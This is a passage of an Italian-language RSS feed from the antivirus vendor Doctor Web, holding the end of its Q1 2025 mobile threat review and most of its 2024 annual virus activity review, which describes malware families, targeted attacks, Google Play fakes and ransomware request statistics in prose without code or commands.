            &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/10_seed_q1_2025.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/10_seed_q1_2025.1.png" alt="PancakeSwap"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p&gt;
        Oltre a ciò, su Google Play di nuovo venivano distribuiti i programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. 
        Molti essi venivano spacciati dai truffatori per applicazioni a tema finanziario, inclusi tutorial, strumenti per l'accesso 
        a servizi di investimento, programmi per la contabilità di finanze personali. Caricavano vari siti di phishing, tra cui quelli 
        utilizzati dai malintenzionati per raccogliere dati personali.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/11_Android.FakeApp.1803_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/11_Android.FakeApp.1803_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/12_Android.FakeApp.1777_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/12_Android.FakeApp.1777_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, distribuiti sotto apparenze di software finanziari: «Умные Деньги» (trad. da russ. 
        "Denaro intelligente") — &lt;b&gt;Android.FakeApp.1803&lt;/b&gt;, Economic Union — &lt;b&gt;Android.FakeApp.1777&lt;/b&gt;
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Altri trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; a determinate condizioni caricavano siti di scommesse e casinò online. Tali varianti dei programmi malevoli 
        venivano distribuite sotto finte sembianze di svariati giochi e altri software — ad esempio, attrezzo allenatore per digitazione veloce e tutorial 
        di disegno. Tra di esse c'erano anche nuove varianti del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1669&lt;/b&gt;.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/13_Android.FakeApp.1669_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/13_Android.FakeApp.1669_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/14_Android.FakeApp.1669_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/14_Android.FakeApp.1669_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di programmi malevoli falsificazione che, invece delle funzionalità promesse, potevano caricare siti di casinò online e scommesse
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Per proteggere i dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.
    &lt;/p&gt;
&lt;/section&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=14965&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per il 2024</title><link>https://news.drweb-av.it/show/?i=14965&amp;lng=it&amp;c=9</link><pubDate>Thu, 30 Jan 2025 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;30 gennaio 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;Nel 2024 tra le minacce più diffuse di nuovo erano i programmi malevoli creati con l'utilizzo del linguaggio di scripting AutoIt e distribuiti come parte di altri software malevoli per complicarne il rilevamento. Si osservava un'alta attività dei trojan pubblicitari e vari script malevoli. Nel traffico email il più frequentemente venivano rilevati gli script malevoli. Inoltre, tramite email indesiderate venivano distribuiti gli svariati programmi trojan, i documenti di phishing e gli exploit, che consentono di eseguire codice arbitrario.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Tra le minacce mobili, sono stati i più diffusi i programmi trojan pubblicitari, i trojan spia e i software pubblicitari indesiderati. 
        Durante l'anno, si registrava una crescita dell'attività dei trojan bancari. Contemporaneamente il nostro laboratorio dei virus ha rilevato 
        centinaia di nuovi programmi malevoli e indesiderati sullo store di app Google Play.
    &lt;/p&gt;
    &lt;p&gt;
        Gli analisti internet notavano un'alta attività dei truffatori online, il cui arsenale è stato ampliato con nuovi schemi di inganno.
    &lt;/p&gt;
    &lt;p&gt;
        Rispetto al 2023, è diminuito il numero di richieste utente per la decriptazione di file colpiti dalle attività dei trojan di criptazione. 
        Allo stesso tempo, i nostri specialisti osservavano numerosi eventi relativi alla sicurezza informatica. Durante l'anno, l'azienda Doctor Web ha 
        indagato su diversi attacchi mirati, ha identificato un'ennesima infezione di set top box TV con sistema operativo Android, nonché ha respinto un 
        attacco alla propria infrastruttura.
    &lt;/p&gt;
    
    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;Principali tendenze dell'anno&lt;/h4&gt;
        &lt;ul&gt;
          &lt;li&gt;Persiste l'alta attività dei trojan creati con l'utilizzo del linguaggio di scripting AutoIt&lt;/li&gt;
          &lt;li&gt;Tra le minacce più diffuse erano gli script malevoli&lt;/li&gt;
          &lt;li&gt;Tra le minacce email prevalevano gli script malevoli e i vari programmi trojan&lt;/li&gt;
          &lt;li&gt;Sono stati registrati nuovi attacchi mirati&lt;/li&gt;
          &lt;li&gt;Malintenzionati sfruttano più spesso la tecnologia eBPF per nascondere l'attività malevola&lt;/li&gt;
          &lt;li&gt;Diminuito il numero di richieste di decriptazione di file colpiti dai trojan ransomware&lt;/li&gt;
          &lt;li&gt;Alta attività dei truffatori internet&lt;/li&gt;
          &lt;li&gt;Trojan bancari mobili venivano utilizzati più spesso&lt;/li&gt;
          &lt;li&gt;Rilevate molte nuove minacce sullo store di app Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;Eventi più interessanti del 2024&lt;/h2&gt;
    &lt;p&gt;
        A gennaio gli specialisti Doctor Web &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;i=14792" target="_blank" rel="noopener noreferrer"&gt;hanno riferito&lt;/a&gt; 
        di un trojan cryptominer, &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.BtcMine.3767&amp;lng=it"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt;, che era nascosto in programmi pirata i quali venivano distribuiti attraverso un canale Telegram 
        appositamente creato e una serie di siti internet. Il malware ha infettato decine di migliaia di computer Windows. Per ottenere persistenza nel sistema sotto 
        attacco, esso creava nella pianificazione un'attività per il proprio avvio automatico e aggiungeva sé stesso alle eccezioni dell'antivirus Windows Defender. 
        Quindi incorporava nel processo 
        &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Esplora file di Windows) un componente direttamente responsabile del mining di criptovaluta. 
        &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.BtcMine.3767&amp;lng=it"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt; inoltre consentiva di effettuare una serie di altre azioni dannose — ad esempio, installare un rootkit fileless, bloccare l'accesso 
        a siti e impedire l'aggiornamento del sistema operativo.
    &lt;/p&gt;
    &lt;p&gt;
        A marzo la nostra azienda &lt;a href="https://news.drweb.com/show/?i=14823&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;ha pubblicato uno studio&lt;/a&gt; 
        su un attacco mirato a un'impresa russa dell'industria metalmeccanica. L'indagine sull'incidente ha rivelato un vettore di infezione a più stadi e l'utilizzo 
        simultaneo di più applicazioni malevole da parte dei malintenzionati. Di maggior interesse era il backdoor &lt;a href="https://vms.drweb-av.it/search/?q=JS.BackDoor.60&amp;lng=it"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt; 
        attraverso cui avveniva la principale interazione tra gli attaccanti e il computer infetto. Questo trojan utilizza un proprio framework in linguaggio JavaScript 
        ed è costituito da un corpo base e da moduli ausiliari. Consente di rubare file dai dispositivi infetti, monitorare informazioni digitate sulla tastiera, creare 
        screenshot, scaricare i propri aggiornamenti ed estendere le proprie funzionalità tramite il caricamento di nuovi moduli.
    &lt;/p&gt;
    &lt;p&gt;
        A maggio gli analisti dei virus Doctor Web &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14860" target="_blank" rel="noopener noreferrer"&gt;hanno rilevato&lt;/a&gt; 
        un trojan clicker denominato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.414.origin&amp;lng=it"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; in un'applicazione per la gestione di giocattoli per adulti Love Spouse, nonché in un'applicazione 
        per il monitoraggio dell'attività fisica QRunning — entrambe venivano distribuite attraverso Google Play. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.414.origin&amp;lng=it"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; era mascherato da 
        componente per la raccolta di informazioni di debug ed era incorporato in diverse nuove versioni di questi programmi. In seguito, gli sviluppatori di Love Spouse hanno 
        rilasciato una versione aggiornata che non conteneva più il trojan. Non c'è stata alcuna reazione da parte degli autori del secondo programma. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.414.origin&amp;lng=it"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; 
        aveva un'architettura modulare e con l'ausilio dei propri componenti era in grado di eseguire varie azioni dannose: raccogliere dati sul dispositivo infetto, caricare segretamente 
        pagine web, visualizzare annunci pubblicitari, effettuare clic e interagire con il contenuto delle pagine caricate.
    &lt;/p&gt;
    &lt;p&gt;
        A luglio &lt;a href="https://news.drweb-av.it/show/?i=14877&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;abbiamo parlato&lt;/a&gt; della comparsa della versione 
        Linux di un noto trojan di accesso remoto, TgRat, utilizzato per attacchi mirati a computer. La nuova variante dell'applicazione malevola, denominata 
        &lt;a href="https://vms.drweb-av.it/search/?q=Linux.BackDoor.TgRat.2&amp;lng=it"&gt;&lt;b&gt;Linux.BackDoor.TgRat.2&lt;/b&gt;&lt;/a&gt;, è stata identificata durante un'indagine su un incidente di sicurezza informatica con cui ci ha contattati uno dei provider di hosting. 
        L'antivirus Dr.Web aveva rilevato un file sospetto su un server di uno dei suoi clienti — questo è stato identificato come un dropper di backdoor il quale installava il trojan. 
        I malintenzionati gestivano &lt;a href="https://vms.drweb-av.it/search/?q=Linux.BackDoor.TgRat.2&amp;lng=it"&gt;&lt;b&gt;Linux.BackDoor.TgRat.2&lt;/b&gt;&lt;/a&gt; tramite un gruppo Telegram privato utilizzando un bot Telegram ad esso connesso. Tramite il programma di messaggistica, 
        loro potevano scaricare file dal sistema compromesso, catturare schermate, eseguire comandi in remoto o caricare file sul computer utilizzando gli allegati nella chat.
    &lt;/p&gt;
    &lt;p&gt;
        All'inizio di settembre sul sito dell'azienda Doctor Web è stato pubblicato un 
        &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;i=14899" target="_blank" rel="noopener noreferrer"&gt;materiale&lt;/a&gt; 
        che parlava di un attacco mirato non riuscito a una grande impresa russa dell'industria del trasporto di merci ferroviario. 
        Qualche mese prima i collaboratori del dipartimento di sicurezza informatica di questa azienda avevano registrato un'email 
        sospetta con un file ad essa allegato. Dallo studio effettuato dai nostri analisti dei virus è emerso che questo era una 
        scorciatoia Windows mascherata da documento pdf, in cui erano trascritti parametri di avvio dell'interprete comandi PowerShell. 
        L'apertura di questa scorciatoia doveva portare a un'infezione in più fasi del sistema di destinazione da contemporaneamente più 
        programmi malevoli per cyberspionaggio. Uno di questi era &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Siggen27.11306&amp;lng=it"&gt;&lt;b&gt;Trojan.Siggen27.11306&lt;/b&gt;&lt;/a&gt; che sfruttava la vulnerabilità
        &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6473" target="_blank" rel="noopener noreferrer"&gt;CVE-2024-6473&lt;/a&gt; 
        di Yandex Browser per l'intercettazione dell'ordine di ricerca di DLL (DLL Search Order Hijacking). Il trojan collocava nella directory 
        di installazione del browser una libreria dll con il nome di un componente di sistema, &lt;span class="string"&gt;Wldp.dll&lt;/span&gt;, 
        responsabile di garantire la sicurezza dell'avvio di applicazioni. In quanto il file malevolo si trovava nella cartella dell'applicazione, 
        all'avvio di quest'ultima, in conseguenza della vulnerabilità del browser, alla libreria trojan veniva data una priorità più alta, ed essa 
        veniva caricata per prima. Essa inoltre riceveva tutti i permessi del browser stesso. Questa vulnerabilità in seguito è stata risolta.
    &lt;/p&gt;
    &lt;p&gt;
        Qualche tempo dopo i nostri specialisti hanno segnalato &lt;a href="https://news.drweb-av.it/show/?i=14900&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;un ennesimo attacco&lt;/a&gt; 
        ai box TV basati su sistema operativo Android. Nella campagna veniva adoperato un programma malevolo, denominato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, 
        il quale ha contagiato quasi 1.300.000 dispositivi degli utenti da 197 paesi. Questo era un backdoor modulare che collocava i propri componenti nell'area di sistema e su comando 
        dei malintenzionati poteva scaricare e avviare di nascosto altre applicazioni.
    &lt;/p&gt;
    &lt;p&gt;
        Oltre a ciò, a settembre è stato registrato un &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;i=14904" target="_blank" rel="noopener noreferrer"&gt;attacco mirato&lt;/a&gt; 
        alle risorse della nostra azienda. Gli specialisti Doctor Web hanno prontamente stroncato il tentativo di danneggiare l'infrastruttura 
        &lt;a href="https://news.drweb-av.it/show/?i=14907&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;respingendo con successo l'attacco&lt;/a&gt;. 
        Nessuno dei nostri utenti è stato colpito.
    &lt;/p&gt;
    &lt;p&gt;
        Ad ottobre gli analisti dei virus Doctor Web &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;i=14918" target="_blank" rel="noopener noreferrer"&gt;hanno informato&lt;/a&gt;
        del rilevamento di alcuni nuovi malware per sistema operativo Linux. Sono stati rilevati grazie a un'indagine su attacchi a dispositivi con il database management 
        system Redis installato, il quale diventa sempre più spesso oggetto dell'attenzione dei cybercriminali che sfruttano in esso diverse vulnerabilità. Tra le minacce 
        individuate erano backdoor, dropper e una nuova variante di un rootkit che installava sui dispositivi compromessi un trojan cryptominer, Skidmap. Questo cryptominer 
        è attivo dal 2019, e il suo obiettivo principale sono risorse aziendali — grandi server e ambienti cloud.
    &lt;/p&gt;
    &lt;p&gt;
        Lo stesso mese, il nostro laboratorio dei virus ha scoperto una &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;i=14920" target="_blank" rel="noopener noreferrer"&gt;campagna su larga scala&lt;/a&gt;
        per la distribuzione dei programmi malevoli per estrazione e furto di criptovalute. Dalle attività dei malintenzionati sono stati colpiti oltre 28.000 utenti, 
        la maggior parte dei quali erano in Russia. I trojan erano nascosti in software pirata per la cui distribuzione venivano utilizzati siti fraudolenti creati s
        ulla piattaforma GitHub. Inoltre, gli autori dei virus inserivano i link al download delle applicazioni malevole sotto filmati pubblicati sulla piattaforma YouTube.
    &lt;/p&gt;
    &lt;p&gt;
        A novembre i nostri specialisti &lt;a href="https://news.drweb-av.it/show/?i=14935&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;hanno scoperto&lt;/a&gt;
        una serie di nuove varianti del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;, il cui compito è quello di caricare siti. A differenza della maggior 
        parte degli altri programmi malevoli simili, &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; ottiene gli indirizzi dei siti di destinazione dal record TXT dei server 
        DNS malevoli, per cui utilizza codice modificato della libreria open source dnsjava. Allo stesso tempo, il trojan manifesta l'attività malevola solo 
        in caso di connessione a internet tramite determinati provider. Negli altri casi, funziona come un software innocuo.
    &lt;/p&gt;
    &lt;p&gt;
        Alla fine del 2024, nel processo di indagine su una richiesta di uno dei nostri clienti, gli specialisti del laboratorio dei virus Doctor Web 
        &lt;a href="https://news.drweb-av.it/show/?i=14955&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;hanno individuato&lt;/a&gt;
        un'attiva campagna hacker orientata principalmente agli utenti dall'Asia sud-orientale. Nel corso degli attacchi, i criminali informatici adoperavano 
        tutta una serie di applicazioni malevole, nonché facevano uso di metodi e tecniche che solo stanno guadagnando popolarità tra gli autori dei virus. In 
        particolare, sfruttavano la tecnologia eBPF (extended Berkeley Packet Filter), creata per un controllo avanzato sul sottosistema di rete del sistema 
        operativo Linux e sul funzionamento di processi. Questa tecnologia veniva utilizzata per mascherare l'attività di rete e i processi malevoli, raccogliere 
        informazioni riservate, nonché bypassare i firewall e i sistemi di rilevamento di intrusioni. Un'altra tecnica consisteva nel memorizzare le impostazioni 
        del software trojan non su un server di comando e controllo, ma su piattaforme pubbliche, come la piattaforma GitHub e i blog. La terza caratteristica degli 
        attacchi è stato l'utilizzo di framework post-sfruttamento insieme ad applicazioni malevole. Sebbene tali strumenti non siano malevoli e vengano utilizzati per 
        l'audit di sicurezza di sistemi informatici, le loro funzionalità e la presenza di database di vulnerabilità sono in grado di espandere le possibilità degli attaccanti.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="virobst"&gt;
    &lt;h2 class="alignCenter"&gt;Situazione di virus&lt;/h2&gt;
    &lt;p&gt;
        Secondo i dati delle statistiche di rilevamento dell'antivirus Dr.Web, nel 2024 il numero totale di minacce rilevate è aumentato del 26,20% rispetto al 2023. 
        Il numero di minacce uniche è cresciuto del 51,22%. Tra i programmi malevoli più frequentemente riscontrati erano i trojan creati in linguaggio di scripting AutoIt, 
        che vengono distribuiti come parte di altri malware per complicarne il rilevamento. Inoltre, gli utenti dovevano affrontare i vari script malevoli e i trojan di 
        visualizzazione di annunci pubblicitari.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/01_stat_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/01_stat_2024_en.png" alt="stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1224&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1131&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1124&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1222&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una versione impacchettata del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; scritto nel linguaggio di script AutoIt. Viene distribuita come parte di un gruppo di diverse applicazioni malevole: un miner di criptovalute, un backdoor e un modulo per la propagazione autonoma. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; esegue varie azioni malevole che ostacolano il rilevamento del payload principale.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.StartPage1.62722&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma malevolo che sostituisce furtivamente la pagina iniziale nelle impostazioni del browser.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.BPlug.3814&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di componenti malevoli di un'estensione browser WinSafe. Questi componenti rappresentano script JavaScript che visualizzano pubblicità invadenti in browser.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di premuta del pulsante Escape chiudendole forzatamente ("разработчика" – rus. "di sviluppatore", "розробника" – ucr. "di sviluppatore").&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;BAT.AVKill.37&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Componente del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;. Questo script avvia altri componenti del malware, li imposta in esecuzione automatica tramite la pianificazione Windows, nonché li aggiunge alle eccezioni dell'antivirus Windows Defender.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Unsecure.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan che blocca l'avvio degli antivirus e di altri software tramite i criteri AppLocker in sistema operativo Windows.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;p&gt;
        Tra le minacce email, i più diffusi sono stati i vari script malevoli e tutti i tipi di programmi trojan, quali backdoor, 
        downloader e dropper di malware, trojan con funzionalità spia, applicazioni malevole per il mining di criptovalute e altri ancora. 
        I malintenzionati inviavano, inoltre, i documenti di phishing, che spesso rappresentano falsi moduli di autenticazione su popolari siti. 
        Oltre a questo, gli utenti si imbattevano nei worm e nelle applicazioni malevole che sfruttano vulnerabilità in documenti Microsoft Office.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/02_email_traffic_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/02_email_traffic_2024_en.png" alt="mail_traffic_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Una famiglia di script malevoli, scritti nel linguaggio JavaScript. Incorporano uno script malevolo nel codice HTML di pagine web.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una scorciatoia appositamente formata che viene distribuita tramite unità rimovibili e, per fuorviare gli utenti, ha l'icona di un disco. Alla sua apertura, vengono avviati script VBS malevoli da una directory nascosta situata sulla stessa unità della scorciatoia.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Un worm di rete che si diffonde, tra l'altro, anche attraverso dispositivi rimovibili.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consente di eseguire codice arbitrario.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1122&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una versione impacchettata del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; scritto nel linguaggio di script AutoIt. Viene distribuita come parte di un gruppo di diverse applicazioni malevole: un miner di criptovalute, un backdoor e un modulo per la propagazione autonoma. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; esegue varie azioni malevole che ostacolano il rilevamento del payload principale.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.SpyBot.699&amp;lng=it"&gt;&lt;b&gt;Trojan.SpyBot.699&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Un trojan banker multi-modulo. Consente ai criminali informatici di scaricare e avviare varie applicazioni ed eseguire codice arbitrario sul dispositivo infetto.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;VBS.BtcMine.13&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;VBS.BtcMine.12&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Script malevolo nel linguaggio VBS che esegue il mining di criptovalute nascosto.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
    &lt;h2 class="alignCenter"&gt;Ransomware di criptazione&lt;/h2&gt;
    &lt;p&gt;
        Rispetto al 2023, nel 2024 il servizio di supporto tecnico Doctor Web ha ricevuto il 33,05% in meno di richieste 
        dagli utenti interessati dai programmi trojan ransomware di criptazione. La dinamica di registrazione delle richieste 
        di decriptazione di file è presentata sul diagramma sotto:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/03_encoder_requests_14_2024_en.1.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/03_encoder_requests_14_2024_en.1.png" alt="encoders_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;I ransomware di criptazione più diffusi nel 2024:&lt;/p&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; (13,13% delle richieste utente)&lt;/dt&gt;
        &lt;dd&gt;Ransomware di criptazione anche conosciuto come Mimic. Durante la ricerca dei file di destinazione da criptare, il trojan utilizza una libreria, everything.dll, di un programma legittimo, Everything, progettato per la ricerca istantanea di file sui computer Windows.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.3953&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.3953&lt;/b&gt;&lt;/a&gt; (12,10% delle richieste utente)&lt;/dt&gt;
        &lt;dd&gt;Ransomware di criptazione avente più versioni e varianti diverse. Per criptare i file, utilizza l'algoritmo AES-256 in modalità CBC.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.26996&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; (7,44% delle richieste utente)&lt;/dt&gt;
